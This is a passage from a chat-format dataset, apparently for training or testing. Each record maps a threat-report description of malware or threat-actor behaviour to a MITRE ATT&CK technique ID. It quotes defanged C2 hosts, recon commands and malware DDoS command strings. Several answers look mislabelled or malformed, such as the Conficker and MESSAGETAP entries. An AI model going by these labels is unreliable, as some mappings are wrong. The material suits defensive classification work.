- {
- "role": "user",
- "content": "Stuxnet enumerates user accounts of the local host."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has encrypted domain-controlled systems using BitPaymer."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from the machine"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since version 0.2.6 This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user’s SID and server password"
- },
- {
- "role": "assistant",
- "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used JavaScript to execute malicious code on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used Systeminfo to gather system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information on local groups and members on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for network drives and removable media and duplicates itself onto them."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use dynamic DNS domain names in C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. 7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. 6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. 7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has run \"hostname\" and \"systeminfo\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell can browse the file system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used Pastebin and Google Storage to host content for their operations."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers. Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack – after the victim becomes aware of it. This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has used HTTP and HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C& Cs."
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates screenshot files to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies security software such as antivirus through the Security module."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can gather information from the Keepass password manager."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT performs code injection injecting its own functions to browser processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. When opening the document, the user must click on the \"Enable content\" button, which enables macros (fig. 5 Example of an email message with a Word document, which, when opened, requires the user to click on the \"Enable content\" button to enable a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. In addition, Cobalt Strike enables users not to expose a fragment of memory allocated in the context of another process, the RWX (Read, Write, Execute) attributes, which often reveal injected code"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This directory will also contain the process id of the running malware in process.id and a “build name” (as it is called by the author) in build.id"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains keylogger functionality."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adbupd can use a WMI script to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook was signed with valid Certum certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DNS for the C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The dropped files are now stored in a folder located in C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\ always following the same pattern similar to the following: 4CA-B25C11-A27BC. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp. Mysterious Wintask.xml . Our initial analysis in a sandbox showed that the C2 contact module attempts to execute this file, searching for it in the same path as the document search module, which we further corroborated with manual analysis. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has created payloads in the Startup directory to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon can collect the IP address of the victims and other computers on the network using the commands: \"ipconfig -all\" \"nbtstat -n\", and \"nbtstat -s\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has scanned for open ports and used nbtscan to find NETBIOS nameservers."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our observation of related actions here: u ps start password stealing (Windows) Ps_mps/ps_hwi start start password stealing (Linux, MIPS, ARM) uper_mps/uper_hwi start rewrite hook module with a new version and launch it (Linux, MIPS, ARM) Nm_mps/nm_hwi start –ban -middle Scan ports and retrieve banners on the router subnet (Linux, MIPS, ARM) U fsget * 7 *.docx, *.pdf, *.doc * search for docs with the given filetypes (Windows) S sinfo retrieve information on installed programs and launch commands: systeminfo, tasklist, ipconfig, netstat, route print, tracert www.google.com (Windows) weap_mps/weap_hwi host188.128.123.52 port[25,26,110,465,995] typetcpconnect DDoS on 188.128.123.52 (Linux, MIPS, ARM) weap_mps/weap_hwi typesynflood port80 cnt100000 spdmedium host212.175.109.10 DDoS on 212.175.109.10 (Linux, MIPS, ARM) The issued commands for the Linux plugins suggest the attackers controlled infected MIPS/ARM devices. We want to pay special attention to the DDoS commands meant for these routers"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor's payloads are custom-packed, archived and encrypted to prevent analysis."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs."
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBALL has been executed through users being lured into opening malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. Once installed, the malware checks for the existence of two files: keyword_parm.txt and parm.txt and attempts to read the configuration files every 30 seconds"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has been disguised as legitimate Adobe and PotPlayer files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "64) u= {B5B70BD7-87FC-499A-B4D1- 98163306F0D8} A GUID r= 1 Boolean value if the malware is running as injected code t= 8035187 Number of milliseconds the computer has been running Table 3"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group tools can delete files used during an operation."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decrypted shellcode is dropped as a Microsoft Word plugin WLL into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP."
- },
- {
- "role": "assistant",
- "content": "T1137 - Office Application Startup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to identify the user on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deobfuscated, we can see it is the HawkEye Keylogger — Reborn v9, Version=9.0.1.6"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell script collects all possible information on the user and the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, AVs registered in the system, privileges, domain and workgroup information"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores output from command execution in a .dat file in the %TEMP% directory."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRat is a remote access Trojan (RAT) that operates with two DLLs. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
